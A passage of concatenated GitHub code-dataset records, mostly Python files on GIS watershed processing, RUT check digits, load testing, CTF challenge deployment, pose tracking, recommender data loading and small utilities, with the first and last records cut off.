ogr\nfrom tqdm import tqdm\nfrom utils import clean_temp\nwbt = whitebox.WhiteboxTools()\n\ndef split_polygon(input_shape, split_shape_output):\n fn = input_shape \n driver = ogr.GetDriverByName('ESRI Shapefile') # See OGR Vector Format for other options\n dataSource = driver.Open(fn)\n layer = dataSource.GetLayer()\n sr = layer.GetSpatialRef() # Spatial Reference\n dst = split_shape_output\n new_feat = ogr.Feature(layer.GetLayerDefn()) # Dummy feature\n\n for id, feat in enumerate(layer):\n new_ds = driver.CreateDataSource(r\"{}\\watershed_{}.shp\".format(dst, id))\n new_lyr = new_ds.CreateLayer('watershed_{}'.format(id), sr, ogr.wkbPolygon) \n geom = feat.geometry().Clone()\n new_feat.SetGeometry(geom)\n \n new_lyr.CreateFeature(new_feat)\n del new_ds, new_lyr\n\n\ndef buffer_basins(input_basin, buffered_basin):\n gdf = gpd.read_file(input_basin)\n gdf['geometry'] = gdf.geometry.buffer(0)\n gdf.to_file(buffered_basin)\n\ndef main(tempdir, dem, coastline, size, isobasins, split_isobasins):\n clean_temp.clean(tempdir)\n wbt.fill_missing_data(\n i = dem, \n output = tempdir + 'filledmissing.tif', \n filter=666, \n weight=2.0, \n no_edges=True\n ) \n\n wbt.breach_depressions(\n dem = tempdir + 'filledmissing.tif', \n output = tempdir + 'breached.tif', \n max_depth=None, \n max_length=None, \n flat_increment=0.001, \n fill_pits=True\n )\n\n wbt.isobasins(\n dem = tempdir + 'breached.tif', \n output = tempdir + 'isobasins.tif', \n size = size, \n connections=True\n )\n\n wbt.raster_to_vector_polygons(\n i = tempdir + 'isobasins.tif', \n output = tempdir + 'isobasins.shp'\n )\n\n wbt.erase(\n i = tempdir + 'isobasins.shp', \n erase = coastline, \n output = tempdir + 'erasedisobasins.shp'\n )\n # Isobasins are generated along the coast as well which\n # means that a lot of small areas are created. 
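(Under EPSG:3006, a projected metric CRS, .area comes out in m^2, so the division by 10**6 below converts it to km^2.) 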
Therefore polygons smaller than\n # 2 km2 were removed.\n gdf = gpd.read_file(tempdir + 'erasedisobasins.shp')\n # reproject; to_crs returns a new GeoDataFrame, so the result must be assigned back\n gdf = gdf.to_crs(epsg=3006)\n gdf['poly_area'] = gdf['geometry'].area/ 10**6\n gdf = gdf.loc[gdf['poly_area'] > 2] # 2 square km\n gdf.to_file(isobasins)\n\n \n print('explode isobasin shapefile')\n split_polygon(isobasins, tempdir)\n\n print('buffer isobasins')\n # A buffer of 0 is applied to correct topological errors.\n pathtoshapefiles = tempdir + '/*.shp'\n listofshapefiles = glob.glob(pathtoshapefiles)\n for basin in tqdm(listofshapefiles):\n if 'erasedisobasins' not in basin and 'isobasins' not in basin:\n \n bufferedbasin = split_isobasins + os.path.basename(basin)\n buffer_basins(basin, bufferedbasin)\n\n clean_temp.clean(tempdir)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Select the lidar tiles which contains training data',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('tempdir', help='path to ramdisk') \n parser.add_argument('dem', help='path to the directory of 50 m dem')\n parser.add_argument('coastline', help='path to a shapefile of the coastline')\n parser.add_argument('size', help='target size of isobasins in int values', type=int)\n parser.add_argument('isobasins', help='path to output isobasin shapefile')\n parser.add_argument('split_isobasins', help='path to output isobasin dir for split isobasins') \n args = vars(parser.parse_args())\n main(**args)","repo_name":"williamlidberg/Hydrologically-correct-DEM-from-LiDAR","sub_path":"create_isobasins.py","file_name":"create_isobasins.py","file_ext":"py","file_size_in_byte":3720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29347434029","text":"#Cálculo del dígito verificador de un rut\n\nprint(\"Hola! aquí conoceremos tu dígito verificador. 
Comencemos!\")\nrut = input(\"Ingrese rut (sin puntos y sin en numero luego de guión): \")\n\nif (len(rut) == 8):\n a1 = int(rut[7])\n a2 = int(rut[6])\n a3 = int(rut[5])\n \n a4 = int(rut[4])\n a5 = int(rut[3])\n a6 = int(rut[2])\n\n a7 = int(rut[1])\n a8 = int(rut[0])\n\n b1 = (a1 * 2)\n b2 = (a2 * 3)\n b3 = (a3 * 4)\n\n b4 = (a4 * 5)\n b5 = (a5 * 6)\n b6 = (a6 * 7)\n\n b7 = (a7 * 2)\n b8 = (a8 * 3)\n\n r = (b1 + b2 + b3 + b4 + b5 + b6 + b7 + b8)\n\n r1 = (r//11)\n r2 = r - (11 * r1)\n r_f = 11 - r2\n\n frase1 = \"dv=\" + str(r_f)\n\n if (r_f == 11):\n print(\"dv=0\")\n\n elif (r_f == 10):\n print(\"dv=k\")\n\n else:\n print(frase1)\n\nelif (len(rut) == 7):\n a2 = int(rut[6])\n a3 = int(rut[5])\n \n a4 = int(rut[4])\n a5 = int(rut[3])\n a6 = int(rut[2])\n\n a7 = int(rut[1])\n a8 = int(rut[0])\n\n b2 = (a2 * 2)\n b3 = (a3 * 3)\n\n b4 = (a4 * 4)\n b5 = (a5 * 5)\n b6 = (a6 * 6)\n\n b7 = (a7 * 7)\n b8 = (a8 * 2)\n\n r = (b2 + b3 + b4 + b5 + b6 + b7 + b8)\n \n r1 = (r//11)\n r2 = r - (11 * r1)\n r_f = 11 - r2\n\n frase1 = \"dv=\" + str(r_f)\n \n if (r_f == 11):\n print(\"dv=0\")\n elif (r_f == 10):\n print(\"dv=k\")\n else:\n print(frase1)\n\n\n","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej5/hito1_ej5_f6ff858d5a715152089106430b9e5e5d.py","file_name":"hito1_ej5_f6ff858d5a715152089106430b9e5e5d.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43869902056","text":"import random\n\nfrom locust import TaskSet, HttpLocust, task\nfrom urllib.parse import urlencode\n\n\nclass ApiClientBehavior(TaskSet):\n \"\"\"\n The @task decorator declares a locust task.\n The argument passed the task decorator determines\n the relative frequency with which the task\n will be spawned within a swarm. 
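As a concrete check of that arithmetic: the six tasks in this file use weights 1 through 6 (sum 21), so quick_check should account for roughly 1/21 of spawned tasks and predict_from_values_dnn for about 6/21. 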
For example\n a task with a relative frequency of 1 will be\n spawned half as often as a task with a\n relative frequency of 2.\n \"\"\"\n\n @task(1)\n def quick_check(self):\n self.client.get(\"/\", name='/', headers={\"Accept\": \"application/json\"})\n\n @task(2)\n def get_current(self):\n self.client.get(\"/current\", name='/current', headers={\"Accept\": \"application/json\"})\n\n @task(3)\n def predict_from_city_linear(self):\n cities = [\"paris,fr\", \"london,uk\", \"berlin,de\", \"beijing,cn\", \"stockholm,se\"]\n params = urlencode({'model': 'linear', 'city': random.choice(cities)})\n self.client.get(\"/predict_from_city?\" + params,\n name='/predict_from_city',\n headers={\"Accept\": \"application/json\"})\n\n @task(4)\n def predict_from_values_linear(self):\n params = urlencode({\n 'model': 'linear',\n 'temp_max': round(random.uniform(0.0, 100.0), 2),\n 'temp_min': round(random.uniform(0.0, 100.0), 2),\n 'pressure': round(random.uniform(0.0, 100.0), 2),\n 'humidity': round(random.uniform(0.0, 100.0), 2)\n })\n self.client.get(\"/predict_from_values?\" + params,\n name='/predict_from_values',\n headers={\"Accept\": \"application/json\"})\n\n @task(5)\n def predict_from_city_dnn(self):\n cities = [\"paris,fr\", \"london,uk\", \"berlin,de\", \"beijing,cn\", \"stockholm,se\"]\n params = urlencode({'model': 'dnn', 'city': random.choice(cities)})\n self.client.get(\"/predict_from_city?\" + params,\n name='/predict_from_city',\n headers={\"Accept\": \"application/json\"})\n\n @task(6)\n def predict_from_values_dnn(self):\n params = urlencode({\n 'model': 'dnn',\n 'temp_max': round(random.uniform(0.0, 100.0), 2),\n 'temp_min': round(random.uniform(0.0, 100.0), 2),\n 'pressure': round(random.uniform(0.0, 100.0), 2),\n 'humidity': round(random.uniform(0.0, 100.0), 2)\n })\n self.client.get(\"/predict_from_values?\" + params,\n name='/predict_from_values',\n headers={\"Accept\": \"application/json\"})\n\n\nclass ApiClient(HttpLocust):\n task_set = ApiClientBehavior\n\n # How long should a task wait after the batch\n # member is spawned before executing. 
This creates\n # randomness in the traffic patterns rather than\n # having every member of the batch try to execute\n # at once.\n min_wait = 1000\n max_wait = 5000\n","repo_name":"tfuntanilla/iot-weather","sub_path":"extras/locustfile.py","file_name":"locustfile.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24862800480","text":"import os, time, threading, requests\n\nclass killThread(threading.Thread):\n def __init__(self, name):\n threading.Thread.__init__(self)\n self.name = name\n\n\n def run(self):\n count = 0\n while True:\n if count >= 30:\n for i in range(3):\n try:\n os.system(\"docker kill mc_realworld_client_\" + self.name)\n time.sleep(1)\n os.system(\"docker rm -f mc_realworld_client_\" + self.name)\n time.sleep(1)\n except:\n continue\n time.sleep(2)\n break\n count += 1\n time.sleep(1)\n\n\ndef deploy(name):\n os.system('./x11docker --env NAME=' + name + ' --env ADDR=134.175.230.10 --env PORT=4080 --name=mc_realworld_client_' + name + ' --user=root -- --network=de1ctf-mc-net -- mc_realworld_client &')\n time.sleep(5)\n thread = killThread(name)\n thread.start()\n\n\nurl = 'http://134.175.230.10:443/v2L4qFXhGU4AFiGv/deploy'\n\nwhile True:\n resp = 0\n try:\n resp = requests.get(url, timeout=3)\n except:\n time.sleep(1)\n continue\n pipe = resp.text\n print(pipe)\n if '\\n' in pipe:\n for i in pipe.split('\\n'):\n if len(i) == 12:\n print(time.time(), i)\n open('deploylog.txt', 'a').write(str(time.time()) + ' ' + i + '\\n')\n deploy(i)\n time.sleep(1)","repo_name":"impakho/de1ctf-mc_challs","sub_path":"docker/realworld/client/remote_deploy_client.py","file_name":"remote_deploy_client.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"77"} +{"seq_id":"1151225136","text":"import sys\nsys.stdin = open(\"input.txt\", 'r')\n\nhh1, mm1, ss1 = map(int, input().split(':'))\nhh2, mm2, ss2 = map(int, input().split(':'))\n\ntotal_ss1 = hh1*3600 + mm1*60 + ss1\ntotal_ss2 = hh2*3600 + mm2*60 + ss2\n\nif total_ss1 > total_ss2:\n total_ss2 += 86400\n\nres = total_ss2 - total_ss1\n\nprint(f'{res//3600:#02d}:{res%3600//60:#02d}:{res%3600%60:#02d}')","repo_name":"hjyoon/baekjoon-answers","sub_path":"_1000/1408.py","file_name":"1408.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39524215011","text":"import os\nimport random\nimport time\nfrom pathlib import Path\n\nimport nonebot\nfrom nonebot.log import logger\n\nfrom src.libraries.globalMessage import guess_sendwitchoutcd\n\ntry:\n import ujson as json\nexcept:\n logger.warning('ujson not find, import json instead')\n import json\n\n\n\nclass guessCardManager:\n def __init__(self) -> None:\n # 读取全局变量\n try:\n self.path = str(Path(nonebot.get_driver().config.ocg_bot_guess_cfg_path, 'ocg_bot_guess_cfg.json'))\n except:\n self.path = 'data/ocg_bot/ocg_bot_guess_cfg.json'\n self.guess_cd = 20\n self.guess_cd = self.guess_cd if self.guess_cd > 0 else 0\n # 读取perm_cfg\n self.ReadCfg()\n\n # --------------- 文件读写 开始 ---------------\n # 读取cfg\n def ReadCfg(self) -> dict:\n try:\n # 尝试读取\n with open(self.path, 'r', encoding='utf-8') as f:\n self.cfg = json.loads(f.read())\n return self.cfg\n except Exception as e:\n # 读取失败\n logger.warning(f'setu_perm_cfg.json 读取失败, 尝试重建\\n{e}')\n self.cfg = {}\n self.WriteCfg()\n return {}\n\n # 写入cfg\n def 
WriteCfg(self):\n # 尝试创建路径\n os.makedirs(self.path[:-18], mode=0o777, exist_ok=True)\n # 写入数据\n with open(self.path, 'w', encoding='utf-8') as f:\n f.write(json.dumps(self.cfg))\n\n # --------------- 文件读写 开始 ---------------\n\n # --------------- 查询系统 开始 ---------------\n # 查询上一次发送时间\n def ReadLastSend(self, sessionId):\n try:\n return self.cfg['last'][sessionId]\n except KeyError:\n return 0\n\n # 查询cd\n def ReadCd(self, group_sessionId):\n try:\n return self.cfg[group_sessionId]['cd']\n except KeyError:\n return self.guess_cd\n\n # 查询黑名单\n def ReadBanList(self, sessionId):\n try:\n return sessionId in self.cfg['ban']\n except KeyError:\n return False\n\n # --------------- 查询系统 结束 ---------------\n\n # --------------- 逻辑判断 开始 ---------------\n # 查询权限, 并返回修正过的参数\n def CheckPermission(self, sessionId: str,groupSession: str, userType: str = 'group'):\n if self.ReadBanList(groupSession):\n raise PermissionError(f'猜卡功能已关闭!')\n # 查询冷却时间\n if groupSession is None:\n timeLeft = self.ReadCd(sessionId) + self.ReadLastSend(sessionId) - time.time()\n else:\n timeLeft = self.ReadCd(groupSession) + self.ReadLastSend(sessionId) - time.time()\n if timeLeft > 0:\n hours, minutes, seconds = 0, 0, 0\n if timeLeft >= 60:\n minutes, seconds = divmod(timeLeft, 60)\n hours, minutes = divmod(minutes, 60)\n else:\n seconds = timeLeft\n cd_msg = f\"{str(round(hours)) + '小时' if hours else ''}{str(round(minutes)) + '分钟' if minutes else ''}{str(round(seconds, 3)) + '秒' if seconds else ''}\"\n raise PermissionError(f\"{random.choice(guess_sendwitchoutcd)} 你的CD还有{cd_msg}!\")\n # --------------- 逻辑判断 结束 ---------------\n\n # --------------- 冷却更新 开始 ---------------\n # 最后一次发送的记录\n def UpdateLastSend(self, sessionId):\n try:\n self.cfg['last'][sessionId] = time.time()\n except KeyError:\n self.cfg['last'] = {\n sessionId: time.time()\n }\n\n # --------------- 冷却更新 结束 ---------------\n\n # --------------- 增删系统 开始 ---------------\n\n # cd部分\n def UpdateCd(self, sessionId: str, cdTime: int):\n # 检查数据是否超出范围,超出则设定至范围内\n cdTime = cdTime if cdTime > 0 else 0\n # 读取原有数据\n try:\n cdTime_old = self.cfg[sessionId]['cd']\n except KeyError:\n cdTime_old = '未设定'\n # 写入新数据\n if sessionId not in self.cfg.keys():\n self.cfg[sessionId] = {}\n self.WriteCfg()\n self.cfg[sessionId]['cd'] = cdTime\n self.WriteCfg()\n # 返回信息\n return f'cd更新成功 {cdTime_old} -> {cdTime}'\n\n def UpdateBanList(self, sessionId: str, add_mode: bool):\n # 加入黑名单\n if add_mode:\n try:\n if sessionId in self.cfg['ban']:\n return f'功能已经关闭'\n except KeyError:\n self.cfg['ban'] = []\n self.cfg['ban'].append(sessionId)\n self.WriteCfg()\n return f'功能已经关闭'\n # 移出黑名单\n else:\n try:\n self.cfg['ban'].remove(sessionId)\n self.WriteCfg()\n return f'功能已经开启'\n except ValueError:\n return f'功能已经开启'\n # --------------- 增删系统 结束 ---------------\n","repo_name":"fireinsect/ocg-bot","sub_path":"src/libraries/guessManage.py","file_name":"guessManage.py","file_ext":"py","file_size_in_byte":5116,"program_lang":"python","lang":"en","doc_type":"code","stars":113,"dataset":"github-code","pt":"77"} +{"seq_id":"2717068754","text":"from collections import deque\n\nfrom collections import deque\n\n\nclass Solution:\n \"\"\"\n @param: nums: A list of integers\n @param: k: An integer\n @return: The maximum number inside the window at each moving\n \"\"\"\n\n def maxSlidingWindow(self, nums, k):\n if not nums or not k:\n return []\n\n dq = deque([])\n\n for i in range(k - 1):\n self.push(dq, nums, i)\n print('in first for, i =', i, \" dq = \", dq)\n\n result = []\n for i in range(k - 1, len(nums)):\n 
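# Monotonic deque invariant: dq[0] always holds the max of the current window.\n 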
print('in second for, i =', i, \" dq = \", dq)\n self.push(dq, nums, i)\n result.append(dq[0])\n print(\"res.append:\",dq[0])\n # evict the element leaving the window (nums[i - k + 1]) only if it is the current max;\n # popping whenever len(dq) == k removed the wrong element and produced wrong answers\n if dq[0] == nums[i - k + 1]:\n print(\"pop left\")\n dq.popleft()\n\n return result\n\n def push(self, dq, nums, i):\n while dq and dq[-1] < nums[i]:\n dq.pop()\n dq.append(nums[i])\n\ns = Solution()\nnums = [1,3,1,2,0,5]\nk = 3\nres = s.maxSlidingWindow(nums,k)\nprint(res)\n\n","repo_name":"ZhouXing-19/Algorithms","sub_path":"九章算法/Leetcode Excercise/Sliding Window Maximum.py","file_name":"Sliding Window Maximum.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33675226963","text":"from collections import defaultdict\nimport urllib, csv\n\ndef load_data_from_csv(csv_file, users_to_i = {}, items_to_i = {}):\n \"\"\"\n Loads data from a CSV file located at `csv_file` \n where each line is of the form:\n\n user_id_1, item_id_1\n ...\n user_id_n, item_id_n\n\n Initial mappings from user and item identifiers\n to integers can be passed using `users_to_i`\n and `items_to_i` respectively.\n\n This function will return a data array consisting\n of (user, item) tuples, a mapping from user ids to integers\n and a mapping from item ids to integers.\n \"\"\"\n raw_data = []\n with open(csv_file) as f:\n csvreader = csv.reader(f)\n for user, item in csvreader:\n raw_data.append((user, item))\n return load_data_from_array(raw_data, users_to_i, items_to_i)\n\ndef load_data_from_movielens(url, threshold, users_to_i = {}, items_to_i = {}):\n \"\"\"\n Loads movielens data from a URL, e.g.\n\n http://files.grouplens.org/datasets/movielens/ml-100k/\n\n Initial mappings from user and item identifiers\n to integers can be passed using `users_to_i`\n and `items_to_i` respectively.\n\n This function will return a data array consisting\n of (user, item) tuples, a mapping from user ids to integers\n and a mapping from item ids to integers.\n \"\"\"\n raw_data = []\n for line in urllib.urlopen(url).readlines():\n user, item, rating, timestamp = line.split('\\t')\n if int(rating) > threshold:\n raw_data.append((user, item))\n # forward the initial mappings instead of silently discarding them\n return load_data_from_array(raw_data, users_to_i, items_to_i)\n\ndef load_data_from_array(array, users_to_i = {}, items_to_i = {}):\n \"\"\"\n Loads data from an array of tuples of the form:\n\n (user_id, item_id)\n\n Initial mappings from user and item identifiers\n to integers can be passed using `users_to_i`\n and `items_to_i` respectively.\n\n This function will return a data array consisting\n of (user, item) tuples, a mapping from user ids to integers\n and a mapping from item ids to integers.\n \"\"\"\n data = []\n if len(users_to_i.values()) > 0:\n u = max(users_to_i.values()) + 1\n else:\n u = 0\n if len(items_to_i.values()) > 0:\n i = max(items_to_i.values()) + 1\n else:\n i = 0\n for user, item in array:\n if not users_to_i.has_key(user):\n users_to_i[user] = u\n u += 1\n if not items_to_i.has_key(item):\n items_to_i[item] = i\n i += 1\n data.append((users_to_i[user], items_to_i[item]))\n return data, users_to_i, items_to_i\n\n","repo_name":"bbc/theano-bpr","sub_path":"theano_bpr/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"77"} +{"seq_id":"25616134980","text":"import tkinter\nimport tkinter.messagebox\nimport customtkinter\nimport settings\n\n\ndef main():\n # список всех созданных кнопок\n buttons_list = []\n\n # отключить текущую кнопку, включить все другие в 
навигационном меню\n def disable_button(button):\n cur_fg_color = button.cget('fg_color')\n # возвращаем все кнопки в исходное, рабочее состояние\n [(bt.configure(state=customtkinter.NORMAL, fg_color=cur_fg_color)) for bt in buttons_list]\n # отключаем текущую нажатую кнопку и подсвечиваем, что выбран этот пункт меню\n button.configure(state=customtkinter.DISABLED, fg_color='#3b9e0d', text_color_disabled='#f6f5fa')\n\n def settings_button_pressed(button):\n disable_button(button)\n\n # Настройки темы\n customtkinter.set_appearance_mode(\"System\") # Темы: system (default), light, dark\n customtkinter.set_default_color_theme(\"blue\") # Темы тоже, расцветка: blue (default), dark-blue, green\n\n # Главное окно\n app = customtkinter.CTk() # создаем главное окно\n app.title('Simple File Transfer') # Заголовок окна\n app.iconbitmap('icon.ico')\n app.geometry(\"800x500\") # Размер окна\n app.resizable(False, False) # Нельзя менять размеры окна\n app.eval('tk::PlaceWindow . center') # Размещаем главное окно по центру экрана (на самом деле не совсем)\n\n # Левая навигационная панель, она же главная\n navigation_panel = customtkinter.CTkFrame(app)\n navigation_panel.pack(side=tkinter.LEFT)\n navigation_panel.configure(width=200, height=500)\n\n # Пункт меню, кнопка \"Передача файлов\"\n files_pg_button = customtkinter.CTkButton(master=navigation_panel, text='Передача файлов',\n command=lambda: settings_button_pressed(files_pg_button),\n font=('Bold', 20), bg_color='transparent')\n files_pg_button.place(relx=0.5, rely=0.1, anchor=customtkinter.CENTER)\n\n # Пункт меню, кнопка \"Настройки\"\n settings_pg_button = customtkinter.CTkButton(master=navigation_panel, text='Настройки',\n command=lambda: settings_button_pressed(settings_pg_button),\n font=('Bold', 20), bg_color='transparent')\n settings_pg_button.place(relx=0.5, rely=0.2, anchor=customtkinter.CENTER)\n\n buttons_list.extend([files_pg_button, settings_pg_button])\n\n # Так надо\n app.mainloop()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Bl00dWolf/SimpleFileTransfer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19122006969","text":"# -*- coding: utf-8 -*-\nimport cv2\nimport sys\nimport time\nimport numpy as np\n\nimport pygame\n# Cargar OpenPose:\nsys.path.append('/usr/local/python')\nfrom openpose import *\n# from utils import poses2boxes\n# from pymongo import MongoClient\n# import json\n\nfrom deep_sort.iou_matching import iou_cost\nfrom deep_sort.kalman_filter import KalmanFilter\nfrom deep_sort.detection import Detection\nfrom deep_sort.tracker import Tracker as DeepTracker\nfrom deep_sort import nn_matching\nfrom deep_sort import preprocessing\nfrom deep_sort.linear_assignment import min_cost_matching\nfrom deep_sort.detection import Detection as ddet\nfrom tools import generate_detections as gdet\nfrom utils import poses2boxes\n\nimport Constants\n\nclass Input():\n def __init__(self, debug = False):\n #from openpose import *\n params = dict()\n params[\"logging_level\"] = 3\n params[\"output_resolution\"] = \"-1x-1\"\n params[\"net_resolution\"] = \"160x160\"\n params[\"model_pose\"] = \"BODY_25\"\n params[\"alpha_pose\"] = 0.6\n params[\"scale_gap\"] = 0.3\n params[\"scale_number\"] = 1\n params[\"render_threshold\"] = 0.05\n params[\"num_gpu_start\"] = 0\n params[\"disable_blending\"] = False\n # Ensure you point to the correct path where models are located\n 
params[\"default_model_folder\"] = Constants.PATH + \"/models/\"\n self.openpose = OpenPose(params)\n\n max_cosine_distance = Constants.max_cosine_distance\n nn_budget = Constants.nn_budget\n self.nms_max_overlap = Constants.nms_max_overlap\n max_age = Constants.max_age\n n_init = Constants.n_init\n\n model_filename = 'model_data/mars-small128.pb'\n self.encoder = gdet.create_box_encoder(model_filename,batch_size=1)\n metric = nn_matching.NearestNeighborDistanceMetric(\"cosine\", max_cosine_distance, nn_budget)\n self.tracker = DeepTracker(metric, max_age = max_age,n_init= n_init)\n\n self.capture = cv2.VideoCapture(0)\n if self.capture.isOpened(): # Checks the stream\n self.frameSize = (int(self.capture.get(cv2.CAP_PROP_FRAME_HEIGHT)),\n int(self.capture.get(cv2.CAP_PROP_FRAME_WIDTH)))\n Constants.SCREEN_HEIGHT = self.frameSize[0]\n Constants.SCREEN_WIDTH = self.frameSize[1]\n\n\n def getCurrentFrameAsImage(self):\n frame = self.currentFrame\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n pgImg = pygame.image.frombuffer(frame.tostring(), frame.shape[1::-1], \"RGB\")\n return pgImg\n\n\n def run(self):\n result, self.currentFrame = self.capture.read()\n keypoints, self.currentFrame = self.openpose.forward(self.currentFrame, display = True)\n # print(keypoints)\n # Doesn't use keypoint confidence\n poses = keypoints[:,:,:2]\n # Get containing box for each seen body\n boxes = poses2boxes(poses)\n boxes_xywh = [[x1,y1,x2-x1,y2-y1] for [x1,y1,x2,y2] in boxes]\n features = self.encoder(self.currentFrame,boxes_xywh)\n # print(features)\n\n nonempty = lambda xywh: xywh[2] != 0 and xywh[3] != 0\n detections = [Detection(bbox, 1.0, feature, pose) for bbox, feature, pose in zip(boxes_xywh, features, poses) if nonempty(bbox)]\n # Run non-maxima suppression.\n boxes_det = np.array([d.tlwh for d in detections])\n scores = np.array([d.confidence for d in detections])\n indices = preprocessing.non_max_suppression(boxes_det, self.nms_max_overlap, scores)\n detections = [detections[i] for i in indices]\n # Call the tracker\n self.tracker.predict()\n self.tracker.update( self.currentFrame, detections)\n\n for track in self.tracker.tracks:\n color = None\n if not track.is_confirmed():\n color = (0,0,255)\n else:\n color = (255,255,255)\n bbox = track.to_tlbr()\n cv2.rectangle(self.currentFrame, (int(bbox[0]), int(bbox[1])), (int(bbox[2]), int(bbox[3])),color, 2)\n cv2.putText(self.currentFrame, \"id%s - ts%s\"%(track.track_id,track.time_since_update),(int(bbox[0]), int(bbox[1])-20),0, 5e-3 * 200, (0,255,0),2)\n\n\n # self.currentFrame = np.rot90(self.currentFrame)\n # self.currentFrame = cv2.flip(self.currentFrame, 1)\n # self.updateState()\n cv2.waitKey(1)\n","repo_name":"LHQ0308/liveposetracker","sub_path":"src/Input.py","file_name":"Input.py","file_ext":"py","file_size_in_byte":4378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"42477864666","text":"import logging\nimport click\n\nfrom fedlearner import settings\nfrom fedlearner.scheduler.db import db_model\nfrom fedlearner.scheduler.scheduler import Scheduler\n\n\n@click.group()\ndef scheduler():\n '''\n do action for scheduler in FedLearner.\n '''\n pass #pylint: disable=W0107\n\n\n@scheduler.command('init', help='initialize scheduler environment & database')\n@click.option('-c', '--config', required=False, type=click.File('r'))\ndef scheduler_initialize(config):\n '''\n FedLearner scheduler initialize environment parameter and database init.\n '''\n 
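# NOTE: the -c/--config option above is accepted but not parsed yet; this\n # command currently only creates the database tables.\n 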
db_model.init_database_tables()\n\n\n@scheduler.command('start', help='start fedlearner scheduler service')\n@click.option('-p', '--port', type=int, default=50001)\n@click.option('-d', '--daemon_mode', type=bool, default=False)\ndef scheduler_start(port, daemon_mode):\n '''\n FedLearner scheduler service start.\n '''\n click.echo(settings.HEADER)\n scheduler = Scheduler()\n logging.getLogger().setLevel(logging.INFO)\n scheduler.run(listen_port=port)\n","repo_name":"saswat0/fedlearner","sub_path":"fedlearner/cli/commands/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"40426215119","text":"from PyQt4 import QtCore, QtGui\n\nfrom library.database import addDateInRange\nfrom library.MapCode import createMapCodeToRowIdx\nfrom library.Utils import forceBool, forceInt, forceString\n\nfrom Reports.Report import normalizeMKB, CReport\nfrom Reports.ReportBase import createTable, CReportBase\nfrom Reports.StatReport1NPUtil import havePermanentAttach\n\n\nColumns = [\n (u'A00-T98', u'всего'),\n (u'A00-B99', u'Некоторые инфекционные и паразитарные болезни'),\n (u'D50-D89', u'Болезни крови и кроветворных органов, отдельные нарушения, вовлекающие иммунный механизм'),\n (u'E00-E90', u'Болезни эндокринной системы, расстройства питания и нарушения обмена веществ'),\n (u'F00-F99', u'Психические расстройства и расстройства поведения'),\n (u'G00-G99', u'Болезни нервной системы'),\n (u'H00-H59', u'Болезни глаза и его придаточного органа'),\n (u'H60-H95', u'Болезни уха и сосцевидного отростка'),\n (u'I00-I99', u'Болезни системы кровообращения'),\n (u'I20-I25', u'в том числе: ишемическая болезнь сердца'),\n (u'I10-I15', u'в том числе: болезни, характеризующиеся повышенным кровяным давлением'),\n (u'J00-J99', u'Болезни органов дыхания'),\n (u'K00-K93', u'Болезни органов пищеварения'),\n (u'L00-L99', u'Болезни кожи и подкожной клетчатки'),\n (u'M00-M99', u'Болезни костно-мышечной системы и соединительной ткани'),\n (u'N00-N99', u'Болезни мочеполовой системы'),\n (u'D10-D36.9', u'Доброкачественные нововобразования'),\n (u'R00-R99', u'Симптомы, признаки и отклонения от нормы, выявленные при клинических и лабораторных исследованиях'),\n (u'S00-T98', u'Травмы, отравления и некоторые другие последствия воздействия внешних причин'),\n ]\n\nRows = [\n (u'Численность выявленных больных с данным заболеванием, установленным во время дополнительной диспансеризации', u'02'),\n (u'Численность выявленных больных, нуждающихся в амбулаторно-поликлинич. лечении (из числа выявленных больных стр. 02)', u'03'),\n (u'Численность пролеченных больных в амбулат.-поликлинич. условиях (из числа нуждающихся в лечении стр. 03)', u'04'),\n (u'Численность больных, нуждающихся в стационарн. лечении (из числа выявленных больных стр. 
02)', u'05'),\n (u'Госпитализировано больных в стационары (из числа нуждающихся в госпитализации стр.05)', u'06'),\n ]\n\ndef selectData(begDate, endDate, eventTypeId, onlyPermanentAttach, onlyPayedEvents, begPayDate, endPayDate):\n stmt=\"\"\"\nSELECT\n Event.client_id AS client_id,\n Diagnosis.mkb AS mkb,\n IF((rbDiseaseCharacter.code='1' AND rbDiseaseStage.code='1') OR rbDiseaseCharacter.code='2', 1, 0) AS R2a,\n IF(rbDiseaseCharacter.code IS NOT NULL, 1, 0) AS R2b,\n IF(rbDiagnosisType.code='1', 1, 0) AS final,\n IF(rbHealthGroup.code = '3', 1, 0) AS R3c,\n IF(rbDispanser.observed OR rbDiagnosticResult.code='32', 1, 0) AS R4c,\n IF(rbHealthGroup.code > '3', 1, 0) AS R5c,\n IF(Diagnostic.hospital>1, 1, 0) AS R6c\nFROM\n Diagnostic\n LEFT JOIN Diagnosis ON Diagnosis.id = Diagnostic.diagnosis_id\n LEFT JOIN Event ON Event.id = Diagnostic.event_id\n LEFT JOIN Client ON Client.id = Event.client_id\n LEFT JOIN rbDiagnosisType ON rbDiagnosisType.id = Diagnostic.diagnosisType_id\n LEFT JOIN rbDiseaseCharacter ON rbDiseaseCharacter.id = Diagnostic.character_id\n LEFT JOIN rbDiseaseStage ON rbDiseaseStage.id = Diagnostic.stage_id\n LEFT JOIN 